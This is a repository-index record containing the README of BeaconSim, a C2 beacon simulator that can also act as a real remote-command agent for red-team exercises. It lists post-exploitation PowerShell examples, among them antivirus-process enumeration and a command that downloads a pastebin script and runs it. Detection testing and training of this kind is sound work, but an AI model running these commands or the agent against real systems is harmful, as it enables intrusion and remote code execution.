{"id":28479221,"url":"https://github.com/acquiredsecurity/beaconsim","last_synced_at":"2026-03-03T20:32:54.306Z","repository":{"id":294736939,"uuid":"987896723","full_name":"acquiredsecurity/BeaconSim","owner":"acquiredsecurity","description":"Simulate Malware activity config connections via Yaml","archived":false,"fork":false,"pushed_at":"2025-05-29T13:18:17.000Z","size":30,"stargazers_count":10,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-02-07T13:36:01.907Z","etag":null,"topics":["beacon","eicar-test","malware","malwaresimulation"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/acquiredsecurity.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-05-21T18:46:29.000Z","updated_at":"2025-10-13T14:04:55.000Z","dependencies_parsed_at":"2025-05-21T20:41:55.591Z","dependency_job_id":"1b572572-d5a3-4329-b70d-71286274f4b7","html_url":"https://github.com/acquiredsecurity/BeaconSim","commit_stats":null,"previous_names":["acquiredsecurity/beaconsim"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/acquiredsecurity/BeaconSim","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/acquiredsecurity%2FBeaconSim","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/acquiredsecurity%2FBeaconSim/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/acquiredsecurity%2FBeaconSim/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/acquiredsecurity%2FBeaconSim/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/acquiredsecurity","download_url":"https://codeload.github.com/acquiredsecurity/BeaconSim/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/acquiredsecurity%2FBeaconSim/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30058292,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-03T18:21:05.932Z","status":"ssl_error","status_checked_at":"2026-03-03T18:20:59.341Z","response_time":61,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["beacon","eicar-test","malware","malwaresimulation"],"created_at":"2025-06-07T18:08:35.156Z","updated_at":"2026-03-03T20:32:54.276Z","avatar_url":"https://github.com/acquiredsecurity.png","language":"C#","funding_links":[],"categories":[],"sub_categories":[],"readme":"## BeaconSim - C2 Beacon Simulator\nSimulate Malware activity. Configure connections via different ports and protocls with Yaml.\n---\n\n\n\u003cimg width=\"611\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f8c162a8-d24b-4732-99b5-42d4cd0a4686\" /\u003e\n\n\n# BeaconSim - C2 Beacon Simulator \u0026 Agent\n\n![BeaconSim](https://img.shields.io/badge/Version-2.0-blue) ![Platform](https://img.shields.io/badge/Platform-Windows-lightgrey) ![Framework](https://img.shields.io/badge/.NET-Framework%204.8%20%7C%20.NET%209.0-purple)\n\nBeaconSim is a versatile cybersecurity tool that operates in two modes:\n1. **Beacon Simulation Mode** - Simulate malware C2 communications for testing detection systems\n2. **C2 Agent Mode** - Function as a real C2 agent for red team exercises and security research\n\nGreat for testing Threat Intelligence feeds, verifying detection logic in EDR and SIEMs, and conducting authorized security assessments!\n\n## 🚀 Quick Start\n\n### Simulation Mode (Original)\n```powershell\n.\\BeaconSim.exe --config=targets.yaml --minInterval=30 --maxInterval=120 --loopCount=10\n```\nRemove the C2 settings from the Yaml if you want to use theoriginal targets.\n\n\n### C2 Agent Mode (New)\n```bash\n.\\BeaconSim.exe --c2\n```\n\n## 📖 Usage\n\n```\nBeaconSim - C2 Beacon Simulator \u0026 Agent\n----------------------------------------\nUsage:\n  BeaconSim.exe [--config=path] [--loopCount=N] [--c2]\n\nOptions:\n  --config=path        Path to YAML config file (default: targets.yaml)\n  --loopCount=N        Number of beacon attempts (-1 = infinite)\n  --c2                 Force C2 agent mode\n  --help, -h           Show this help menu and exit\n\nModes:\n  C2 Agent Mode:       Connects to C2 server and executes commands\n  Simulation Mode:     Original beacon simulation (legacy)\n\nExamples:\n  BeaconSim.exe --c2                           # Run as C2 agent\n  BeaconSim.exe --config=myconfig.yaml --c2   # Use custom config\n```\n\n## 🌐 Simulation Mode - Supported Protocols\n\nYou can specify one or more protocols per target in your `targets.yaml` config file. BeaconSim will simulate connection attempts using the selected protocols and ports.\n\n| Protocol | Description | Notes |\n|----------|-------------|--------|\n| `ping` | ICMP echo request (simulated) | Uses DNS resolution to simulate |\n| `http` | HTTP GET request | Port 80 by default |\n| `https` | HTTPS GET request (SSL/TLS) | Port 443 by default |\n| `dns` | DNS resolution via `Dns.GetHostAddressesAsync()` | Uses system resolver |\n| `tcp` | Raw TCP socket connection | Requires port(s) to be defined |\n| `ftp` | TCP connection on port 21 | Simulates basic connection only |\n| `ssh` | TCP connection on port 22 | No authentication performed |\n| `websocket` | WebSocket handshake (if implemented) | Fallbacks to HTTP(s) if needed |\n\n### Simulation Configuration Example\n```yaml\ntargets:\n  - host: \"8.8.8.8\"\n    protocols: [\"ping\", \"tcp\"]\n    ports: [53]\n  - host: \"google.com\"\n    protocols: [\"http\", \"tcp\"]\n    ports: [80, 443]\n  - host: \"github.com\"\n    protocols: [\"http\"]\n```\n\n## 🎯 C2 Agent Mode - Remote Command Execution\n\nWhen running with `--c2` flag, BeaconSim connects to a C2 server and can execute remote PowerShell commands.\n\n### C2 Configuration Example\n```yaml\n# C2 Server Configuration\nc2_server:\n  url: \"http://192.168.1.100:8080\"\n  agent_id: \"agent_001\"\n\n# Beacon timing\nintervals:\n  min_interval: 30\n  max_interval: 120\n```\n\n### Compatible C2 Server\nBeaconSim C2 mode is designed to work with [SimpleC2Listener](https://github.com/acquiredsecurity/SimpleC2Listener).\n\n## 💻 Command Examples\n\nOnce connected to a C2 server, the following PowerShell commands can be executed remotely:\n\n### System Information\n```powershell\nwhoami\nsysteminfo\nGet-ComputerInfo | Select-Object WindowsProductName, TotalPhysicalMemory\n```\n\n### Process Enumeration\n```powershell\nGet-Process | Sort-Object CPU -Descending | Select-Object -First 10\nGet-Process | Where-Object {$_.ProcessName -match \"defender|kaspersky|symantec\"}\n```\n\n### Network Reconnaissance\n```powershell\nipconfig /all\nnetstat -an | findstr LISTENING\nGet-NetIPAddress | Where-Object {$_.AddressFamily -eq \"IPv4\"}\n```\n\n### File System Access\n```powershell\ndir C:\\Users\nGet-ChildItem C:\\ -Recurse -Include *.txt,*.doc -ErrorAction SilentlyContinue\n```\n\n### Remote Script Execution\n```powershell\nIEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/SCRIPT_ID')\n```\n\n## 🔧 Configuration\n\n### Full Configuration Example\n```yaml\n# C2 Server Configuration (for agent mode)\nc2_server:\n  url: \"http://192.168.1.100:8080\"\n  agent_id: \"agent_001\"\n\n# Beacon timing\nintervals:\n  min_interval: 30\n  max_interval: 120\n\n# Targets (for simulation mode)\ntargets:\n  - host: \"8.8.8.8\"\n    protocols: [\"ping\", \"tcp\"]\n    ports: [53]\n  - host: \"google.com\"\n    protocols: [\"http\", \"tcp\"]\n    ports: [80, 443]\n  - host: \"1.1.1.1\"\n    protocols: [\"ping\"]\n  - host: \"github.com\"\n    protocols: [\"http\"]\n  - host: \"example.com\"\n    protocols: [\"ping\", \"http\", \"https\", \"dns\", \"tcp\", \"ftp\", \"websocket\"]\n    ports: [80, 443, 21, 22]\n```\n\n## 🛡️ Security Considerations\n\n**Important:** This tool is designed for authorized security testing and educational purposes only.\n\n### C2 Agent Mode\n- **No encryption** - Communications sent in plaintext HTTP\n- **PowerShell execution** - Executes commands with current user privileges\n- **Network traffic** - Generates detectable C2 traffic patterns\n- **System access** - Can read files and execute system commands\n\n### Simulation Mode\n- **Network connections** - Creates actual network connections to target hosts\n- **DNS queries** - Generates real DNS resolution requests\n- **Detection testing** - Designed to trigger security monitoring systems\n\n## 📋 System Requirements\n\n- **OS:** Windows 10/11, Windows Server 2016+\n- **Framework:** .NET Framework 4.8+ or .NET 9.0+\n- **Dependencies:** \n  - YamlDotNet (for configuration parsing)\n  - Newtonsoft.Json (for C2 communications)\n- **Network:** Internet connectivity for external targets\n- **PowerShell:** Version 5.0+ (for C2 agent mode)\n\n## 🔮 Use Cases\n\n### Security Testing\n- **Red Team Exercises** - Simulate real C2 communications\n- **Blue Team Training** - Generate known-bad traffic for detection testing\n- **SOC Training** - Practice incident response with controlled C2 activity\n- **Tool Validation** - Test EDR, SIEM, and network monitoring tools\n\n### Research and Development\n- **Malware Analysis** - Study C2 communication patterns\n- **Detection Research** - Develop new detection algorithms\n- **Network Security** - Test network segmentation and monitoring\n\n## 📚 Related Projects\n\n- **[SimpleC2Listener](https://github.com/acquiredsecurity/SimpleC2Listener)** - Compatible C2 server for agent mode\n- **BeaconSim Wiki** - Additional documentation and examples\n\n## ⚠️ Disclaimer\n\nThis software is provided for educational and authorized security testing purposes only. Users are responsible for ensuring compliance with all applicable laws and regulations. Only use this tool on systems you own or have explicit permission to test. The authors assume no liability for misuse of this software.\n\n## 📄 License\n\nThis project is licensed under the MIT License - see the LICENSE file for details.\n\n---\n\n**AcquiredSecurity** - Advancing cybersecurity through practical tools and research.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Facquiredsecurity%2Fbeaconsim","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Facquiredsecurity%2Fbeaconsim","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Facquiredsecurity%2Fbeaconsim/lists"}